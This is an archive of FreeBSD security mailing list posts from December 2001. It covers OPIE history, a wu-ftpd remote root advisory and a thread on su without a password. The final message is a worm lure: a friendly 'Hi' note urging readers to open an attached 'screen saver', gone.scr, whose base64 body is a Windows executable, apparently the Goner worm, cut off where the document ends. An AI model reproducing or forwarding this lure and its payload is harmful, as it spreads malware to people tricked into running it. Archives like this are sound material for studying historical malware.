List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

skey was bellcore. they gave the project over to NRL (naval research labs)
but retained the name skey. now it's OPIE (onetime passwords in everything)
and is maintained, last i checked, by NRL. also, last i checked, freebsd's
OPIE is at least one minor revision behind the NRL releases but nobody
seems to care much whenever i've mentioned it.

p.s. THANKS CORE TEAM


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 10:54:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id 6C05337B41D; Tue,  4 Dec 2001 10:54:18 -0800 (PST)
Received: (from nectar@localhost)
	by freefall.freebsd.org (8.11.6/8.11.6) id fB4IsIa19207;
	Tue, 4 Dec 2001 10:54:18 -0800 (PST)
	(envelope-from security-advisories@freebsd.org)
Date: Tue, 4 Dec 2001 10:54:18 -0800 (PST)
Message-Id: <200112041854.fB4IsIa19207@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f
From: FreeBSD Security Advisories <security-advisories@freebsd.org>
To: FreeBSD Security Advisories <security-advisories@freebsd.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:64.wu-ftpd
Reply-To: security-advisories@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:64                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          wu-ftpd port contains remote root compromise

Category:       ports
Module:         wu-ftpd
Announced:      2001-12-04
Credits:        CORE Security Technologies
                Contact: Ivan Arce (iarce@corest.com)
Affects:        Ports collection prior to the correction date
Corrected:      2001-11-28 10:52:26 UTC
FreeBSD only:   NO

I.   Background

wu-ftpd is a popular full-featured FTP server.

II.  Problem Description

The wu-ftpd port, versions prior to wu-ftpd-2.6.1_7, contains a
vulnerability which allows FTP users, both anonymous FTP users and
those with valid accounts, to execute arbitrary code as root on
the local machine.  This may be accomplished by inserting invalid
globbing parameters which are incorrectly parsed by the FTP server
into command input.

The wu-ftpd port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 6000 third-party applications in a ready-to-install
format. The ports collection shipped with FreeBSD 4.4 contains this
problem since it was discovered after the release.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

FTP users, including anonymous FTP users, can cause arbitrary commands
to be executed as root on the local machine.

If you have not chosen to install the wu-ftpd port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the wu-ftpd port/package, if you have installed it.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the wu-ftpd port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/ftp/wu-ftpd-2.6.1_7.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/ftp/wu-ftpd-2.6.1_7.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources

NOTE: It may be several days before updated packages are available. Be
sure to check the file creation date on the package, because the
version number of the software has not changed.

3) download a new port skeleton for the wu-ftpd port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in the FreeBSD ports collection.

Path                                                             Revision
- -------------------------------------------------------------------------
ports/ftp/wu-ftpd/Makefile                                         1.41
ports/ftp/wu-ftpd/files/patch-ap                                   1.2
- -------------------------------------------------------------------------

VII. References

<URL:http://www.securityfocus.com/archive/1/242750>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBPA0CA1UuHi5z0oilAQENSQP9HaHiACNyiHZtV8ILnUZWb+D01qf0wTy2
gbZJGfKL/JTP41KLR4EpUitF5SZ+3Zjm8Ebv8XXCjCFWgIBU1xhZaXgi2U9PRLlG
XxHKzvpGnTuBj3uJiLs2UvAbQ9Jz5Wp02u6fJV75dcbnXTPLSGRvxJZwOb2FHxnE
MBUlG+QDpPw=
=sp+c
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 11:41:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp-server3.tampabay.rr.com (smtp-server3.tampabay.rr.com [65.32.1.41])
	by hub.freebsd.org (Postfix) with ESMTP id DD76737B416
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 11:41:10 -0800 (PST)
Received: from mercenary (65.35.126.255.melbourne-ubr-b.cfl.rr.com [65.35.126.255])
	by smtp-server3.tampabay.rr.com (8.11.2/8.11.2) with SMTP id fB4JfAS05691
	for <freebsd-security@FreeBSD.ORG>; Tue, 4 Dec 2001 14:41:10 -0500 (EST)
Message-ID: <002f01c17cf3$3f75b3a0$ff7e2341@mercenary>
From: "David" <habeeb@cfl.rr.com>
To: <freebsd-security@FreeBSD.ORG>
References: <003901c17cdb$8eec7df0$04e3a8c0@beco.hu>
Subject: Re: su to root without passwd (you are hacked)
Date: Tue, 4 Dec 2001 13:41:12 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Disposition-Notification-To: "David" <habeeb@cfl.rr.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

No, su without a password for root is not an AI feature where freebsd
remembers your password.  The difference between your 2 boxes seems to be
clear, 1 of them (the one which does not ask for a password) has some
backdoors/trojans on it from a novice script kiddie who has compromised your
box.  Your 2nd box could as well be compromised.


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 11:52:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [216.33.66.196])
	by hub.freebsd.org (Postfix) with ESMTP id DBAE037B416
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 11:52:15 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
	id 9493F81D01; Tue,  4 Dec 2001 13:52:15 -0600 (CST)
Date: Tue, 4 Dec 2001 13:52:15 -0600
From: Alfred Perlstein <bright@mu.org>
To: David <habeeb@cfl.rr.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: su to root without passwd (you are hacked)
Message-ID: <20011204135215.P92148@elvis.mu.org>
References: <003901c17cdb$8eec7df0$04e3a8c0@beco.hu> <002f01c17cf3$3f75b3a0$ff7e2341@mercenary>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <002f01c17cf3$3f75b3a0$ff7e2341@mercenary>; from habeeb@cfl.rr.com on Tue, Dec 04, 2001 at 01:41:12PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

* David <habeeb@cfl.rr.com> [011204 13:41] wrote:
> No, su without a password for root is not an AI feature where freebsd
> remembers your password.  The difference between your 2 boxes seems to be
> clear, 1 of them (the one which does not ask for a password) has some
> backdoors/trojans on it from a novice script kiddie who has compromised your
> box.  Your 2nd box could as well be compromised.

Either that or somehow the root password has been nulled out by accident.
Or, the user doing the su'ing somehow has a uid of 0 already.

-- 
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
 start asking why software is ignoring 30 years of accumulated wisdom.'
                           http://www.morons.org/rants/gpl-harmful.php3

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 12:34:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from squall.waterspout.com (squall.waterspout.com [208.13.56.12])
	by hub.freebsd.org (Postfix) with ESMTP
	id D0F4A37B417; Tue,  4 Dec 2001 12:34:09 -0800 (PST)
Received: by squall.waterspout.com (Postfix, from userid 1050)
	id B01CE9B08; Tue,  4 Dec 2001 15:32:18 -0500 (EST)
Date: Tue, 4 Dec 2001 15:32:18 -0500
From: Will Andrews <will@csociety.org>
To: Pomegranate <daver@flag.blackened.net>
Cc: cjc@FreeBSD.ORG, peter.jeremy@alcatel.com.au,
	freebsd-security@FreeBSD.ORG
Subject: Re: OPIE mailing list
Message-ID: <20011204153218.J56385@squall.waterspout.com>
Reply-To: Will Andrews <will@csociety.org>
Mail-Followup-To: Pomegranate <daver@flag.blackened.net>,
	cjc@FreeBSD.ORG, peter.jeremy@alcatel.com.au,
	freebsd-security@FreeBSD.ORG
References: <20011204005211.B37981@blossom.cjclark.org> <20011204182409.0B78A6831@flag.blackened.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011204182409.0B78A6831@flag.blackened.net>
User-Agent: Mutt/1.3.22.1i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Tue, Dec 04, 2001 at 10:24:09AM -0800, Pomegranate wrote:
> skey was bellcore. they gave the project over to NRL (naval research labs)
> but retained the name skey. now it's OPIE (onetime passwords in everything)
> and is maintained, last i checked, by NRL. also, last i checked, freebsd's
> OPIE is at least one minor revision behind the NRL releases but nobody
> seems to care much whenever i've mentioned it.
> 
> p.s. THANKS CORE TEAM

I don't know what you're implying, but the core team has nothing
to do with maintaining FreeBSD's OPIE.  Perhaps you should submit
a patch to get it upgraded instead of screaming at people who
never claimed to be trying to maintain the OPIE code.  Sheesh.

Regards,
-- 
wca

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 12:57:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.uniserve.com (mail2.uniserve.com [204.244.156.10])
	by hub.freebsd.org (Postfix) with ESMTP id C809C37B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 12:57:47 -0800 (PST)
Received: from landons.vpp-office.uniserve.ca ([216.113.198.10] helo=pirahna.uniserve.com)
	by mail2.uniserve.com with esmtp (Exim 3.13 #1)
	id 16BMdK-0006cS-00; Tue, 04 Dec 2001 12:57:42 -0800
Message-Id: <5.1.0.14.0.20011204125646.02d96008@pop.uniserve.com>
X-Sender: landons@pop.uniserve.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 04 Dec 2001 12:57:39 -0800
To: Alfred Perlstein <bright@mu.org>, David <habeeb@cfl.rr.com>
From: Landon Stewart <landons@uniserve.com>
Subject: Re: su to root without passwd (you are hacked)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <20011204135215.P92148@elvis.mu.org>
References: <002f01c17cf3$3f75b3a0$ff7e2341@mercenary>
 <003901c17cdb$8eec7df0$04e3a8c0@beco.hu>
 <002f01c17cf3$3f75b3a0$ff7e2341@mercenary>
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_8679540==_.ALT"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

--=====================_8679540==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed

OR the username you are su'ing from already has a uid of 0 which.  su'ing 
from a username with a uid of 0 would not ask for a password, it would 
simply start a new shell.


At 01:52 PM 12/4/2001 -0600, Alfred Perlstein wrote:
>* David <habeeb@cfl.rr.com> [011204 13:41] wrote:
> > No, su without a password for root is not an AI feature where freebsd
> > remembers your password.  The difference between your 2 boxes seems to be
> > clear, 1 of them (the one which does not ask for a password) has some
> > backdoors/trojans on it from a novice script kiddie who has compromised 
> your
> > box.  Your 2nd box could as well be compromised.
>
>Either that or somehow the root password has been nulled out by accident.
>Or, the user doing the su'ing somehow has a uid of 0 already.
>
>--
>-Alfred Perlstein [alfred@freebsd.org]
>'Instead of asking why a piece of software is using "1970s technology,"
>  start asking why software is ignoring 30 years of accumulated wisdom.'
>                            http://www.morons.org/rants/gpl-harmful.php3
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

---
Landon Stewart
System Administrator
Uniserve Online
landons@uniserve.com
Telephone: (604) 856-6281 ext 399
Toll Free: (877) UNI-Serve ext 399


Right of Use Disclaimer:
"The sender intends this message for a specific recipient and, as it may 
contain information that is privileged or confidential, any use, 
dissemination, forwarding, or copying by anyone without permission from the 
sender is prohibited. Personal e-mail may contain views that are not 
necessarily those of the company."

--=====================_8679540==_.ALT
Content-Type: text/html; charset="us-ascii"

<html>
OR the username you are su'ing from already has a uid of 0 which.&nbsp;
su'ing from a username with a uid of 0 would not ask for a password, it
would simply start a new shell.<br><br>
<br><br>
At 01:52 PM 12/4/2001 -0600, Alfred Perlstein wrote:<br>
<blockquote type=cite class=cite cite>* David &lt;habeeb@cfl.rr.com&gt;
[011204 13:41] wrote:<br>
&gt; No, su without a password for root is not an AI feature where
freebsd<br>
&gt; remembers your password.&nbsp; The difference between your 2 boxes
seems to be<br>
&gt; clear, 1 of them (the one which does not ask for a password) has
some<br>
&gt; backdoors/trojans on it from a novice script kiddie who has
compromised your<br>
&gt; box.&nbsp; Your 2nd box could as well be compromised.<br><br>
Either that or somehow the root password has been nulled out by
accident.<br>
Or, the user doing the su'ing somehow has a uid of 0 already.<br><br>
-- <br>
-Alfred Perlstein [alfred@freebsd.org]<br>
'Instead of asking why a piece of software is using &quot;1970s
technology,&quot;<br>
&nbsp;start asking why software is ignoring 30 years of accumulated
wisdom.'<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<a href="http://www.morons.org/rants/gpl-harmful.php3" eudora="autourl">http://www.morons.org/rants/gpl-harmful.php3</a><br><br>
To Unsubscribe: send mail to majordomo@FreeBSD.org<br>
with &quot;unsubscribe freebsd-security&quot; in the body of the
message</blockquote>
<x-sigsep><p></x-sigsep>
<tt><font face="Courier New, Courier" color="#800080">---<br>
</font><font face="Courier New CE, Courier" color="#0000FF">Landon
Stewart<br>
System Administrator<br>
Uniserve Online<br>
landons@uniserve.com<br>
Telephone: (604) 856-6281 ext 399<br>
Toll Free: (877) UNI-Serve ext 399<br><br>
<br>
</font><font face="Fixedsys" color="#C0C0C0">Right of Use
Disclaimer:<br>
&quot;The sender intends this message for a specific recipient and, as it
may contain information that is privileged or confidential, any use,
dissemination, forwarding, or copying by anyone without permission from
the sender is prohibited. Personal e-mail may contain views that are not
necessarily those of the company.&quot;<br>
</font></html>

--=====================_8679540==_.ALT--


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 13:20:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 7883F37B41A
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 13:17:42 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB4LHeg04215
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 21:17:40 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id VAA08994
	for freebsd-security@freebsd.org; Tue, 4 Dec 2001 21:17:37 GMT
From: "Baldwin, Peter" <freebsd-security-local@insignia.com>
To: "local.freebsd.security" <local.freebsd.security@insignia.com>
Subject: Hi
Date: Tue, 4 Dec 2001 13:15:59 -0800
Message-ID: <F098252D3EC7D21191DB00A0C9337ECBE038EC@exchange-us.isinc.insignia.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C17D08.DEB57990"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C17D08.DEB57990
Content-Type: text/plain

How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


------_=_NextPart_000_01C17D08.DEB57990
Content-Type: application/octet-stream;
	name="gone.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="gone.scr"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA9AHveeWEVjXlhFY15YRWN+n0bjXhhFY0QfhyNfmEVjZB+GI14YRWNUmlj
aHlhFY0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDANVFCjwAAAAAAAAAAOAADwELAQYA
AIAAAAAgAAAAwAEA8EwCAADQAQAAUAIAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABwAgAA
BAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAORhAgCcAAAAAFACAOQR
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNvZGUAAAAA
AMABAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOB0ZXh0AAAAAACAAAAA0AEAAIAAAAAEAAAA
AAAAAAAAAAAAAABAAADgLnJzcmMAAAAAIAAAAFACAAAUAAAAhAAAAAAAAAAAAAAAAAAAQAAAwAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgCpqamurodRuVgxWwA+2b9/CH1h
EEBIC15ZwxU4uJId22TbT3yB7KQPAG6+T8461759B7gOjY0+/wAMAXaDZV4mKV44Li5eJX17Ii+Q
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
